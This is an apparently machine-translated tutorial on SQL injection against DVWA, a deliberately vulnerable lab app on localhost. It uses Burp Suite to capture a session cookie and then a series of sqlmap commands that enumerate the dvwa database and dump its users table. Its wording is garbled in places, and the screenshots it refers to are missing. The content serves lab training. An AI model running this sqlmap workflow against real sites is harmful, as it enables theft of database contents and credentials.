Exploit DVWA File SQL Injection

Just go on the discussion ...:

Here we use encryption Tools: > Mantra > sqlmap > burp suite

do the command as below:

Activate previous menu bactrack SERVICES > mysql start >  apache start

finished in turn. New on the road right..

Activate >Mantra

so the look of firefox like this..

Go to localhost/dvwa in kan is ID: Admin Password: Password
after it entered on SQL injection as below:

Enter right sign ' click Enter so that
Error like below:

Activate foxifroxi..

to know his Cookies immediate look at =>burp suite
see below ...:

This has happened as above our new way to use the > sqlmap
# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=u1jgrclslk8vbejv16qf9iftq2" --dbs

then specify your choice, for example on I chose 2. Enter = >

then specify your choice, for example on I chose [*] dvwa
# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=u1jgrclslk8vbejv16qf9iftq2" -D dvwa --tables

then specify your choice, for example on I chose 2. Enter = >already in the Enter we know the Info Data bases like below ...:

afterwards we continue by selecting the users do as below:#./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=u1jgrclslk8vbejv16qf9iftq2" -D dvwa -T users -C user

After that we kept right on the by selecting the user..
# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=u1jgrclslk8vbejv16qf9iftq2" -D dvwa -T users --columns

well now that we have learned how table > column and type then select one of the 6 fields continue with dumn like below ...: #./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=u1jgrclslk8vbejv16qf9iftq2" -D dvwa -T users --dump

now just wait for the result ... .

   so it's like this ...